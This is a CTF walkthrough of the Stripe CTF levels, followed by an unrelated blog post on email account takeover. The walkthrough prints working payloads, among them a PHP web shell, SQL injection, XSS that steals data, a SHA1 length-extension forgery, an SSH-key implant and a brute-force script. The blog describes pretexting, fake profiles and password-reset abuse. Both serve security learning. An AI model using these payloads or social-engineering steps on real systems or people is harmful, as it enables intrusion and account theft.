So let’s step through the code and see what’s happening:
    • creates $filename storing ‘secret-combination.txt’
    • extract $_GET (all GET parameters supplied by the user)
    • if $attempt is set:
    • declare $combination with the trim()’d contents of $filename
    • if $attempt and $combination are equal
      • print contents of ‘level02-password.txt’
    • else
      • print incorrect
So let’s look at what extract() is actually doing…

<br

>

int extract ( array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]] )
Import variables from an array into the current symbol table.
Checks each key to see whether it has a valid variable name. It also checks for collisions with existing variables in the symbol table.
If  extract_type  is not specified, it is assumed to be  EXTR_OVERWRITE.
Well, look at that, they didn’t specify an extract_type, so by default it is EXTR_OVERWRITE, which is,  “If there is a collision, overwrite the existing variable.”
There was even a nice little warning for us,
Do not use extract() on untrusted data, like user input (i.e. $_GET$_FILES, etc.).
So now looking back at the code, we can see that they declare $filename before they use extract(), so this gives us the opportunity to create a collision and overwrite the existing variable with our GET parameters.

In simple terms, it will create variables depending on what you supply in your GET request. In this case we can see that our request /?attempt=SECRET creates a variable $attempt that stores the value “SECRET”, so we could also send ”/?attempt=SECRET&filename=random_file.txt”. The extract() will now overwrite their original $filename with our supplied value, ”random_file.txt”.

So what can we do to make these match? You see how $combination is storing the result of file_get_contents() for the $filename, then using trim() on it. If file_get_contents() returns false due to a file not existing, trim() will then return an empty string. So if we supply a file that does not exist and an empty $attempt, they will match…
So let’s supply:
/?attempt=&filename=file_that_does_not_exist.txt

Level 2:

You are now on Level 2, the Social Network. Excellent work so far! Social Networks are all the rage these days, so we decided to build one for CTF. Please fill out your profile at https://level02-2.stripe-ctf.com/user-alucnmpgjr. You may even be able to find the password for Level 3 by doing so.
The code for the Social Network can be obtained from git clone https://level02-2.stripe-ctf.com/user-alucnmpgjr/level02-code, and is also included below.
So, this one is pretty simple. The areas we’re interested in are:
*snip*

$dest_dir = "uploads/";

*snip*

<form action="" method="post" enctype="multipart/form-data">
   <input type="file" name="dispic" size="40" />
   <input type="submit" value="Upload!">
</form>
 
<p>
   Password for Level 3 (accessible only to members of the club):
   <a href="password.txt">password.txt</a>

 
*snip*
Looking at this, we have an ‘uploads’ directory that that we can access, and a form that we can use to upload images. They have no security in place to check for file-specific file extensions at all. Let’s try uploading a file, but not an image–a php script.
<?php
$output = shell_exec(‘cat ../password.txt’);
echo “<pre>$output</pre>”;
?>
Then just browse to the /uploads/ dir and click on your uploaded php file.

Level 3:

After the fiasco back in Level 0, management has decided to fortify the Secret Safe into an unbreakable solution (kind of like Unbreakable Linux). The resulting product is Secret Vault, which is so secure that it requires human intervention to add new secrets.
A beta version has launched with some interesting secrets (including the password to access Level 4); you can check it out athttps://level03-2.stripe-ctf.com/user-cmzqxoblip. As usual, you can fetch the code for the level (and some sample data) via git clone https://level03-2.stripe-ctf.com/user-cmzqxoblip/level03-code, or you can read the code below.

Ok, so let’s look at some important parts. We know it’s sqlite3 again and how it is setup:

# CREATE TABLE users (
#   id VARCHAR(255) PRIMARY KEY AUTOINCREMENT,
#   username VARCHAR(255),
#   password_hash VARCHAR(255),
#   salt VARCHAR(255)
# );
And
    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    cursor.execute(query)

res = cursor.fetchone()
if not res:
return There’s no such user {0}!n.format(username)
user_id, password_hash, salt = res

calculated_hash = hashlib.sha256(password + salt)
if calculated_hash.hexdigest() != password_hash:
return That’s not the password for {0}!n.format(username)

So we can see that the statement is using our supplied username, which has an SQL injection of course. They’re selecting the id, password_hash, and salt from users where the username equals our input. Let’s load up our own sample database, make some test queries and, see what happens….

sqlite> insert into users values (“myid”, “myusername”, “0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60”, “SUPER_SECRET_SALT”);
sqlite> select id, password_hash, salt FROM users where username = ‘myusername’;
myid|0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60|SUPER_SECRET_SALT
 So, let’s do a union select after and supply exactly what we would like back.
sqlite> select id, password_hash, salt FROM users where username = ‘myusername’ union select ‘new id’, ‘new hash’, ‘new salt’;
myid|0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60|SUPER_SECRET_SALT
new id|new hash|new salt

As you can see, by using a union select we can define in the content of the response. The ‘new id’, ‘new hash’, and ‘new salt’ was in our response. After looking at the code when it does the compare, we can see that it does a sha256(password + salt) and compares it to what was in the response for the sql statement.

Let’s supply our own hash and compare them to each other!
>>> import hashlib
>>> print hashlib.sha256(“lolpassword” + “lolsalt”).hexdigest()
dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5
>>>
We just created our new sha256 hash with the salt ‘lolsalt’; let’s now submit our new hash injection into the SQL statement.

username: z’%20union%20select%20’1′,’dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5′,’lolsalt

password:
lolpassword

The code will now take the password you submitted, hash it with the salt returned from the sql query, then compare it to the hash that was in the response (the salt and hashes that are in the response were the ones we supplied in our injection). This will lead to them matching and you receiving a message similar to this:
Welcome back! Your secret is: “The password to access level04 is: aZnRbEpSfX” (Log out)

Level 4:

The Karma Trader is the world’s best way to reward people for good deeds: https://level04-2.stripe-ctf.com/user-xjqcwqqyvp. You can sign up for an account, and start transferring karma to people who you think are doing good in the world. In order to ensure you’re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.
The very active user karma_fountain has infinite karma, making it a ripe account to obtain (no one will notice a few extra karma trades here and there). The password for karma_fountain‘s account will give you access to Level 5.
You can obtain the full, runnable source for the Karma Trader fromgit clone https://level04-2.stripe-ctf.com/user-xjqcwqqyvp/level04-code. We’ve included the most important files below.
This is a nice little XSS/XSRF challenge. The goal here is to get that karma_fountain to send you some karma, which in turn will let you view their password.
 When registering a new account, you can insert malicious code into the password field, which will then be displayed once you send someone karma because the application is designed to show users your password once they receive karma.
In this situation they’re including JQuery, so it makes our lives even easier when trying to make requests. The idea is to inject some malicious code into the karma_fountains page that will automatically make them transfer you some karma.
I went and created a new user named ‘whoop’ with the password:
‘<script>$.post(“transfer”, { to: “whoop”, amount: “2” } );</script>’
So, now that you can login, send some karma to the karma_fountain and wait… eventually the karma_fountain user will view their page and your injected code will force them to transfer karma to the user ‘whoop’.
Refresh your page until you can view karma fountain’s password on the right.

Level 5:

Many attempts have been made at creating a federated identity system for the web (see OpenID, for example). However, none of them have been successful. Until today.
The DomainAuthenticator is based off a novel protocol for establishing identities. To authenticate to a site, you simply provide it username, password, and pingback URL. The site posts your credentials to the pingback URL, which returns either “AUTHENTICATED” or “DENIED”. If “AUTHENTICATED”, the site considers you signed in as a user for the pingback domain.
You can check out the Stripe CTF DomainAuthenticator instance here:https://level05-1.stripe-ctf.com/user-qoqflihezv. We’ve been using it to distribute the password to access Level 6. If you could only somehow authenticate as a user of a level05 machine…
To avoid nefarious exploits, the machine hosting the DomainAuthenticator has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. Though, you’ve heard that someone forgot to internally firewall off the high ports from the Level 2 server.
Interesting in setting up your own DomainAuthenticator? You can grab the source from git clone https://level05-1.stripe-ctf.com/user-qoqflihezv/level05-code, or by reading on below.
So, this problem is just… insecure communication in general. There are a couple of issues here.
This  code block checks to see if it was a POST but doesn’t check if parameters supplied were on the GET or POST lines:
    post '/*' do
      pingback = params[:pingback]
      username = params[:username]
      password = params[:password]
This is an insecure way of checking if we’re Authenticated…
    def authenticated?(body)
      body =~ /[^w]AUTHENTICATED[^w]*$/
There are multiple ways of clearing this level…but Ryan O’Horo showed me his route, which was the cleanest one out of the four we tried. The whole idea is to get it to match the Authenticated regex, but on a host of level5-*.stripe-ctf.com
So…the easiest route….
POST /user-smrqjnvcis/?username=root&pingback=https://level05-1.stripe-ctf.com/user-smrqjnvcis/%3fpingback=http://level05-2.stripe-ctf.com/AUTHENTICATED%250A HTTP/1.1
The pingback URL contains a newline (%0A) so that the regular expression’s end-of-line marker matches after the word “AUTHENTICATED”, and it must be double-encoded as it’s nested in the original pingback parameter
This will make the application do a pingback on level05 host, but since we included http:// instead of https:// it gave a 302 redirect with the URL https://level05-2.stripe-ctf.com/AUTHENTICATED%250A . Which the application matched to the response containing the regex and authenticated the user.
I’m not going to bother showing the other routes some of us took… simply because I’m embarrassed that we made it so much harder on ourselves instead compared to the 1 request solution used by Ryan.

Level 6:

After Karma Trader from Level 4 was hit with massive karma inflation (purportedly due to someone flooding the market with massive quantities of karma), the site had to close its doors. All hope was not lost, however, since the technology was acquired by a real up-and-comer, Streamer. Streamer is the self-proclaimed most steamlined way of sharing updates with your friends. You can access your Streamer instance here: https://level06-2.stripe-ctf.com/user-bqdgqqeqqd
The Streamer engineers, realizing that security holes had led to the demise of Karma Trader, have greatly beefed up the security of their application. Which is really too bad, because you’ve learned that the holder of the password to access Level 7, level07-password-holder, is the first Streamer user.
As well, level07-password-holder is taking a lot of precautions: his or her computer has no network access besides the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and the like.
Fortunately for you, the Streamer engineers have decided to open-source their application so that other people can run their own Streamer instances. You can obtain the source for Streamer at git clone https://level06-2.stripe-ctf.com/user-bqdgqqeqqd/level06-code. We’ve also included the most important files below.
 
Ok, so in this level we’re dealing with a unique social network. We have to find a way to view the other user’s user_info page to see their password. If you started posting some of your own posts you would find that it is susceptible to Cross-Site Scripting. So we need to find a way to get the user to view their user_info page, and then post the results so that we can view them.
We are limited to not using the single-quote and double-quote characters (‘ and “), but everything else is pretty much legal, so we can take use of JavaScript’s String.fromCharCode() and once again JQuery! We’ll have to break out of their script tags, then inject our code, but we also need to make sure the code doesn’t launch until the entire page has been loaded. They have a csrf token, but it’s poorly implemented, seeing that we can use the current JavaScript code that’s already on the page. Another issue that you will run into is that the results from the user_info page have characters that are not allowed, so we will escape() the data response before posting it. Here’s the payload that I used before String.fromCharCode:
</script><script>$(document).ready(function() {$.get(‘user_info’, function(data) {document.forms[0].body.value = escape(data); document.forms[0].submit();})});</script><script>//
And here it is after….
</script><script>$(document).ready(function() {eval(String.fromCharCode(36,46,103,101,116,40,39,117,115,101,114,95,105,110,102,111,39,44,32,102,117,110,99,116,105,111,110,40,100,97,116,97,41,32,123,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,98,111,100,121,46,118,97,108,117,101,32,61,32,101,115,99,97,112,101,40,100,97,116,97,41,59,32,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,115,117,98,109,105,116,40,41,59,125,41))});</script><script>//
We can now wait and watch posts being created–you can simply keep an eye on /ajax/posts so that your XSS won’t also hit yourself. You’ll soon see a new post by the Level7 user that consists of a huge block of URL-encoded characters. Go ahead and decode them and you’ll see something like…

Level 7:

 
Welcome to the penultimate level, Level 7.
WaffleCopter is a new service delivering locally-sourced organic waffles hot off of vintage waffle irons straight to your location using quad-rotor GPS-enabled helicopters. The service is modeled after TacoCopter, an innovative and highly successful early contender in the airborne food delivery industry. WaffleCopter is currently being tested in private beta in select locations.
Your goal is to order one of the decadent Liège Waffles, offered only to WaffleCopter’s first premium subscribers.
Log in to your account at https://level07-2.stripe-ctf.com/user-dsccixwxvo with username ctf and password password. You will find your API credentials after logging in. You can fetch the code for the level via
git clone https://level07-2.stripe-ctf.com/user-dsccixwxvo/level07-code, or you can read it below. You may find the sample API client in client.py particularly helpful.
This level was a slight twist, you’ll actually be doing an attack on their crypto. Looking at the code you’ll see that they’re using SHA1 hashes that are composed of the raw request that you made plus your secret. We also need to be making a request as a premium user. If you attempted to order a waffle, you’ll receive a confirmation number–in this case if you order the premium waffle, the confirmation number will be your password to Level8.
Here is the block of code that verifies the signature… this is how we know how it is built and that it is sha1
def verify_signature(user_id, sig, raw_params):
    # get secret token for user_id
    try:
        row = g.db.select_one('users', {'id': user_id})
    except db.NotFound:
        raise BadSignature('no such user_id')
    secret = str(row['secret'])

h = hashlib.sha1()
h.update(secret + raw_params)
print computed signature, h.hexdigest(), for body, repr(raw_params)
if h.hexdigest() != sig:
raise BadSignature(signature does not match)
return True

Researching on SHA1 we can see that it has a length-extension attack vulnerability, a type of attack on certain hashes which allow inclusion of extra information. There’s excellent documentation that describes this attack in the Flickr API Signature Forgery Vulnerability write-up. There’s also a nice script and write-up about it at vnsecurity by RD, about how he solved a similar CodeGate 2010 challenge. For my solution I used the script that was supplied on vnsecurity to solve this problem. Since we know what the raw request will be, and we know the length of the secret (14), we can append stuff to the raw request and generate a valid hash. So looking at the /logs/ directory, we can also view other users requests… in this case we’re interested in premium users, so id 1 or 2.
This is a request that was made by user_id 1:
count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo|sig:a75edb45bc6c0057e059b23bc48b84f7081a798f
As you can see, we have the raw request and the final hash… let’s append to this and generate a new valid hash, but ordering  a different waffle.
droogie$ python sha-padding.py ’14’ ‘count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo’ ‘a75edb45bc6c0057e059b23bc48b84f7081a798f’ ‘&waffle=liege’
new msg: ‘count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggox80x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x02(&waffle=liege’
base64: Y291bnQ9MTAmbGF0PTM3LjM1MSZ1c2VyX2lkPTEmbG9uZz0tMTE5LjgyNyZ3YWZmbGU9ZWdnb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIoJndhZmZsZT1saWVnZQ==
new sig: 4c230b26a20f192c4a258f529662d3dd0ad8b62d
And here we are… the script has supplied the correct amount of padding needed and gave us the raw required and a valid hash… let’s go ahead and make the request using a simple python script….
droogie$ cat post.py
import urllib
import urllib2
url = ‘https://level07-2.stripe-ctf.com/user-dsccixwxvo/orders’
data = ‘count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggox80x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x02(&waffle=liege|sig:4c230b26a20f192c4a258f529662d3dd0ad8b62d’
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
print response.read()
droogie$ python post.py
{“confirm_code”: “BdxavaMIKC“, “message”: “Great news: 10 liege waffles will soon be flying your way!”, “success”: true}

Level 8:

Welcome to the final level, Level 8.
HINT 1: No, really, we’re not looking for a timing attack.
HINT 2: Running the server locally is probably a good place to start. Anything interesting in the output?
UPDATE: If you push the reset button for Level 8, you will be moved to a different Level 8 machine, and the value of your Flag will change. If you push the reset button on Level 2, you will be bounced to a new Level 2 machine, but the value of your Flag won’t change.
Because password theft has become such a rampant problem, a security firm has decided to create PasswordDB, a new and secure way of storing and validating passwords. You’ve recently learned that the Flag itself is protected in a PasswordDB instance, accesible athttps://level08-1.stripe-ctf.com/user-eojzgklshq/.
PasswordDB exposes a simple JSON API. You just POST a payload of the form {"password": "password-to-check", "webhooks": ["mysite.com:3000", ...]} to PasswordDB, which will respond with a{"success": true}" or {"success": false}" to you and your specified webhook endpoints.
(For example, try running curl https://level08-1.stripe-ctf.com/user-eojzgklshq/ -d '{"password": "password-to-check", "webhooks": []}'.)
In PasswordDB, the password is never stored in a single location or process, making it the bane of attackers’ respective existences. Instead, the password is “chunked” across multiple processes, called “chunk servers”. These may live on the same machine as the HTTP-accepting “primary server”, or for added security may live on a different machine. PasswordDB comes with built-in security features such as timing attack prevention and protection against using unequitable amounts of CPU time (relative to other PasswordDB instances on the same machine).
As a secure cherry on top, the machine hosting the primary server has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. As you learned in Level 5, someone forgot to internally firewall off the high ports from the Level 2 server. (It’s almost like someone on the inside is helping you — there’s an sshd running on the Level 2 server as well.)
To maximize adoption, usability is also a goal of PasswordDB. Hence a launcher script, password_db_launcher, has been created for the express purpose of securing the Flag. It validates that your password looks like a valid Flag and automatically spins up 4 chunk servers and a primary server.
You can obtain the code for PasswordDB from git clone https://level08-1.stripe-ctf.com/user-eojzgklshq/level08-code, or simply read the source below.

This level seems to be a little involved, but it’s easy to understand once you see what it is doing. There is a primary server, and when you launch it you supply it a 12 digit password and a socket to listen on. It will break the password up into 4 chunks of 3 characters each and spawn 4 chunk servers. Each chunk server will have a chunk from the primary and all of your requests will be compared to it. The primary server can then receive requests from you with a password. It will chunk up the supplied password and check with the chunk servers; if it receives TRUE on all 4 it will respond with TRUE, but FALSE on any of them and you’ll get a FALSE. Your goal is to figure out what is the 12 digit password that was supplied to the primary server on startup. When making a request to the primary server you can also supply it with a webhook, where it will send the response to whichever socket you supplied.

There’s a major issue here with their design….
If we bruteforce the 12 digit password, we would be looking at this many attempts:
>>> 10**12
1000000000000
If we bruteforce the chunks, we’re looking at a total of this many:
>>> 10**3*4
4000
Or only a maximum of 1000 attempts per chunk. They’ve just significantly lowered their security if there is any possible way we can tell if a chunk was correct or not, which there is of course 😉
Since the network is so locked down, we can’t actually touch the chunk servers themselves… if we could, we would just bruteforce each chunk and this challenge would be very simple… so we have to find another way to bruteforce each chunk. We also can’t try a timing attack because the developers have implemented some delays on responses to avoid this.
Well one thing we can do is get on the local network so that we can get responses from Level8, using Level2 as the description suggested.
Let’s go ahead and create a local ssh key we can use, then upload it to the Level2 server using that file upload vulnerability.
<?php
mkdir(“../../.ssh”);
$h = fopen(“../../.ssh/authorized_keys”, “w+”);
fwrite($h,”ssh-rsa (MYSECRETLOCALSSHKEY)nn”);
fclose($h);
print “DONE!n”;
?>
Cool, now we can ssh into this box:
Linux leveltwo3.ctf-1.stripe-ctf.com 2.6.32-347-ec2 #52-Ubuntu SMP Fri Jul 27 14:38:36 UTC 2012 x86_64 GNU/Linux
Ubuntu 10.04.4 LTS
Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/
Last login: Mon Aug 27 03:45:20 2012 from cpe-174-097-161-152.nc.res.rr.com
groups: cannot find name for group ID 4334
user-wsotctjptv@leveltwo3:~$
At this point we can create sockets and receive responses from the primary server through our webhook parameters. We’ll be able to take advantage of this and use it as a side channel attack to validate if our requests were true or false. We’ll do this by keeping track of the connections to our socket and their srcport. By default, most operating systems are lazy and will use the last srcport + 1 on a connection… so with an invalid request we know that the difference between source ports would be 2… connection to chunk server 1, then back to us with the response. But if our first chunk happened to be successful it would make a request to chunk server 1, then chunk server 2, then us… so if we are able to make an attempt multiple times and see a difference of 3 in the srcports, we know that it was a valid chunk. We can obviously repeat this process and keep track of the differences to verify the first 3 chunks, then we can just bruteforce the last chunk manually. Here’s a python script written by my co-worker Michael which does just that….

#!/usr/bin/env python

import socket
import urllib2
import json
import sys

try:
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(“–port”, default=49567, type=int, help=”Which port to listen for incoming connections on”)
parser.add_argument(“targetURL”, help=”The URL of the targed primary server”)
parser.add_argument(“webhooksHost”, help=”Where the primary server should connect back for the webhooks”)
args = parser.parse_args()
except ImportError:
# level02 server doesn’t have argparse… grrr
class args(object):
port = 49567
targetURL = sys.argv[1]
webhooksHost = sys.argv[2]

def password_gen(length, prefix=””, charset=”1234567890″):
def gen(length, charset):
if length == 0:
yield “”
else:
for ch in charset:
for pw in gen(length – 1, charset):
yield pw + ch

for pw in gen(length – len(prefix), charset):
yield prefix + pw

def do_webhooks_connectback():
c_sock, addr  = webhook_sock.accept()
c_sock.recv(1000)
c_sock.send(“HTTP/1.0 200rnrn”)
c_sock.close()
return addr[1]

def do_auth_request(password):
print “Trying password:”, password
r = urllib2.urlopen(args.targetURL, json.dumps({“password”:password, “webhooks”:webhook_hosts}))
port = do_webhooks_connectback()
result = json.loads(r.read())

print “Connect back Port:”, port

if result[“success”]:
print “Found the password!!!”
print result
sys.exit(0)
else:
return port

def calc_chunk_servers_for_password(password):
# we need to figure out what the “current” port is, so make a request that will fail
base_port = do_auth_request(“aaa”)
# figure out what the last port number is
final_port = do_auth_request(password)
# we should be able to tell how many chunk servers it talked too
return (final_port – base_port) – 1

# create the listen socket
webhook_sock = socket.socket()
webhook_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
webhook_sock.bind((“”, args.port))
webhook_sock.listen(100)

webhook_hosts = [“%s:%d” % (args.webhooksHost, args.port)]

# We can guess our password by calculating how many TCP connections the primary server has
# made before connecting to our webhook. The more connections the server has made,
# the more chunks that we have correct.

prefix = “”
curr_chunk = 1

while True:
for pw in password_gen(12, prefix):
found_chunk = True
for i in xrange(10):
num_servers = calc_chunk_servers_for_password(pw)
print “Num Servers:”, num_servers
if num_servers == curr_chunk:
# incorrect password
found_chunk = False
break
elif num_servers > curr_chunk:
# we may have figured out a chunk… but someone else may have just made a request
# so we will just try again
continue
elif num_servers < 0:
# ran out of ports and we restarted the port range
continue
else:
# somehow we regressed… abort!
print “[!!!!] Hmmm… somehow we ended up talking to fewer servers than before…”
sys.exit(-1)
if found_chunk:
# ok, we are fairly confident that we have found the next password chunk
prefix = pw[:curr_chunk * 3] # assuming 4 chunk servers, with 3 chars each… TODO: should calc this
curr_chunk += 1
print “[!] Found chunk:”, prefix
break

INSIGHTS | August 17, 2012

One Mail to Rule Them All

This small research project was conducted over a four-week period a while back, so current methods may differ as password restoration methods change.

While writing this blog post, the Gizmodo writer Mat Honan’s account was hacked with some clever social engineering that ultimately brought numerous small bits and pieces of information together into one big chunk of usable data. The downfall in all this is that different services use different alternative methods to reset passwords: some have you enter the last four digits of your credit card and some would like to know your mother’s maiden name; however, the attacks described here differ a bit, but the implications are just as devastating.
For everything we do online today we need an identity, a way to be contacted. You register on some forum because you need an answer, even if it’s just once and just to read that answer. Afterwards, you have an account there, forcing you to trust the service provider. You register on Facebook, LinkedIn, and Twitter; some of you use online banking services, dating sites, and online shopping. There’s a saying that all roads lead to Rome? Well, the big knot in this thread is—you guessed it—your email address.

 

Normal working people might have 1-2 email addresses: a work email that belongs to the company and a private one that belongs to the user. Perhaps the private one is one of the popular web-based email services like Gmail or Hotmail. To break it down a bit, all the sensitive info in your email should be stored in a secure vault, home, or in a bank because it’s important information that, in an attackers hand, could turn your life into a nightmare.

 

I live in a EU country where our social security numbers aren’t considered information worthy of protecting and can be obtained by anyone. Yes, I know—it’s a huge risk. But in some cases you need some form of identification to pick up the sent package. Still, I consider this a huge risk.

 

Physically, I use paper destroyers when I’ve filed a paper and then put it in my safe. I destroy the remnants of important stuff I have read. Unfortunately, storing personal data in your email is easy, convenient, and honestly, how often do you DELETE emails anyway? And if you do, are you deleting them from the trash right away? In addition, there’s so much disk space that you don’t have to care anymore. Lovely.

 

So, you set your email account at the free hosting service and you have to select a password. Everybody nags nowadays to have a secure and strong password. Let’s use 03L1ttl3&bunn13s00!—that’s strong, good, and quite easy to remember. Now for the secure question. Where was your mother born? What’s your pets name? What’s your grandparent’s profession? Most people pick one and fill it out.

 

Well, in my profession security is defined by the weakest link; in this case disregarding human error and focusing on the email alone. This IS the weakest link. How easy can this be? I wanted to dive in to how my friends and family have set theirs up, and how easy it is to find this information, either by goggling it or doing a social engineering attack. This is 2012, people should be smarter…right? So with mutual agreement obtained between myself, friends, and family, this experiment is about to begin.

 

A lot of my friends and former colleagues have had their identities stolen over the past two years, and there’s a huge increase. This has affected some of them to the extent that they can’t take out loans without going through a huge hassle. And it’s not often a case that gets to court, even with a huge amount of evidence including video recordings of the attackers claiming to be them, picking up packages at the local postal offices. 
Why? There’s just too much area to cover, and less man power and competence to handle it. The victims need to file a complaint, and use the case number and a copy of the complaint; and fax this around to all the places where stuff was ordered in their name. That means blacklisting themselves in their system, so if they ever want to shop there again, you can imagine the hassle of un-blacklisting yourself then trying to prove that you are really you this time.

 

A good friend of mine was hiking in Thailand and someone got access to his email, which included all his sensitive data: travel bookings, bus passes, flights, hotel reservations. The attacker even sent a couple of emails and replies, just to be funny; he then canceled the hotel reservations, car transportations, airplane tickets, and some of the hiking guides. A couple days later he was supposed to go on a small jungle hike—just him, his camera, and a guide—the guide never showed up, nor did his transportation to the next location. 
Thanks a lot. Sure, it could have been worse, but imagine being stranded in a jungle somewhere in Thailand with no Internet. He also had to make a couple of very expensive phone calls, ultimately abort his photography travel vacation, and head on home.

 

One of my best friends uses Gmail, like many others. While trying a password restore on that one, I found an old Hotmail address, too. Why? When I asked him about it afterwards, he said he had his Hotmail account for about eight years, so it’s pretty nested in with everything and his thought was, why remove it? It could be good to go back and find old funny stuff, and things you might forget. He’s not keen to security and he doesn’t remember that there is a secret question set. So I need that email.
Lets use his Facebook profile as a public attacker would—it came out empty, darn; he must be hiding his email. However, his friends are displayed. Let’s make a fake profile based on one of his older friends—the target I chose was a girl he had gone to school with. How do I know that? She was publicly sharing a photo of them in high school. Awesome. Fake profile ready, almost identical to the girl, same photo as hers, et cetera. And Friend Request Sent.
A lot of email vendors and public boards such as Facebook have started to implement phone verification, which is a good thing. Right? So I decided to play a small side experiment with my locked mobile phone.
I choose a dating site that has this feature enabled then set up an account with mobile phone verification and an alternative email. I log out and click Forgot password? I enter my username or email, “IOACasanova2000,” click and two options pop up: mobile phone or alternative email. My phone is locked and lying on the table. I choose phone. Send. My phone vibrates and I take a look at the display:  From “Unnamed Datingsite” “ZUGA22”. That’s all I need to know to reset the password.
Imagine if someone steals or even lends your phone at a party. Or if you’re sloppy enough to leave in on a table. I don’t need your pin—at least not for that dating site.What can you do to protect yourself from this?   Edit the settings so the preview shows less of the message. My phone shows three lines of every SMS; that’s way too much. However, on some brands you can disable SMS notifications from showing up on a locked screen.
From my screen i got a instant; Friend Request Accepted.
I quickly check my friend’s profile and see:
hismainHYPERLINK “mailto:hismaingmail@gmail.com”GmailHYPERLINK “mailto:hismaingmail@gmail.com”@HYPERLINK “mailto:hismaingmail@gmail.com”GmailHYPERLINK “mailto:hismaingmail@gmail.com”.com
hishotmail@hotmail.com

 

I had a dog, and his name was BINGO! Hotmail dot com and password reset.
hishotmail@hotmail.com

 

The anti bot algorithm… done…
And the Secret question is active…
“What’s your mother’s maiden name”…

 

I already know that, but since I need to be an attacker, I quickly check his Facebook, which shows his mother’s maiden name! I type that into Hotmail and click OK….

 

New Password: this1sAsecret!123$

 

I’m half way there….

 

Another old colleague of mine got his Hotmail hacked and he was using the simple security question “Where was your mother born”. It was the same city she lived in today and that HE lived in, Malmö (City in Sweden). The attack couldn’t have come more untimely as he was on his way, in an airplane, bound for the Canary Islands with his wife. After a couple of hours at the airport, his flight, and a taxi ride, he gets  a “Sorry, you don’t have a reservation here sir.” from the clerk. His hotel booking was canceled.

 

Most major sites are protected with advanced security appliances and several audits are done before a site is approved for deployment, which makes it more difficult for an attacker to find vulnerabilities using direct attacks aimed at the provided service. On the other hand, a lot of companies forget to train their support personnel and that leaves small gaps. As does their way of handling password restoration. All these little breadcrumbs make a bun in the end, especially when combined with information collected from other vendors and their services—primarily because there’s no global standard for password retrieval. Nor what should, and should not be disclosed over the phone.

 

You can’t rely on the vendor to protect you—YOU need to take precautions yourself. Like destroying physical papers, emails, and vital information. Print out the information and then destroy the email. Make sure you empty the email’s trashcan feature (if your client offers one) before you log out. Then file the printout and put it in your home safety box. Make sure that you minimize your mistakes and the information available about you online. That way, if something should happen with your service provider, at least you know you did all you could. And you have minimized the details an attacker might get.

 

I think you heard this one before, but it bears repeating: Never use the same password twice!
I entered my friend’s email in Gmail’s Forgot Password and answered the anti-bot question.
There we go; I quickly check his Hotmail and find the Gmail password restore link. New password, done.

Now for the gold: his Facebook. Using the same method there, I gained access to his Facebook; he had Flickr as well…set to login with Facebook. How convenient. I now own his whole online “life”.. There’s an account at an online electronics store; nice, and it’s been approved for credit.

An attacker could change the delivery address and buy stuff online. My friend would be knee deep in trouble. Theres also a iTunes account tied to his email, which would allow me to remote-erase his phones and pads. Lucky for him, I’m not that type of attacker.

 

Why would anyone want to have my information? Maybe you’re not that important; but consider that maybe I want access to your corporate network. I know you are employed because of that LinkedIn group. Posting stuff in that group with a malicious link from your account is more trustworthy than just a stranger with a URL. Or maybe you’re good friends with one of the admins—what if I contact him from your account and mail, and ask him to reset your corporate password to something temporary?
I’ve tried the method on six of my friends and some of my close relatives (with permission, of course). It worked on five of them. The other one had forgot what she put as the security question, so the question wasn’t answered truthfully. That saved her.
When I had a hard time finding information, I’d used voice-changing software on my computer, transforming my voice to that of a girl. Girls are gentle and less likely to try a hoax you; that’s how the mind works. Then I’d use Skype to dial them, telling them that I worked for the local church historical department, and the records about their grandfather were a bit hard to read. We are currently adding all this into a computer so people could more easily do ancestor searching and in this case, what I wanted was her grandfather’s profession. So I asked a couple of question then inserted the real question in the middle. Like the magician I am. Mundus vult decipi is latin for; The world wan’t to be decived.
In this case, it was easy.
She wasn’t suspicious at all I thanked her for her trouble and told her I would send two movie tickets as a thank you. And I did.
Another quick fix you can do today while cleaning your email? Use an email forwarder and make sure you can’t log into the email provided with the forwarding email. For example, in my domain there’s the email “spam@xxxxxxxxx.se” that is use for registering on forums and other random sites. This email doesn’t have a login, which means you can’t really log into the email provider with that email. And mail is then forwarded to the real address. An attacker trying to reset that password would not succeed.
Create a new email such as “imp.mail2@somehost.com” and use THIS email for important stuff, such as online shopping, etc. Don’t disclose it on any social sites or use it to email anyone; this is just a temporary container for your online shopping and password resets from the shopping sites. Remember what I said before? Print it, delete it. Make sure you add your mobile number as a password retrieval option to minimize the risk.
It’s getting easier and easier to use just one source for authentication and that means if any link is weak, you jeopardize all your other accounts aswell. You also might pose a risk to your employer.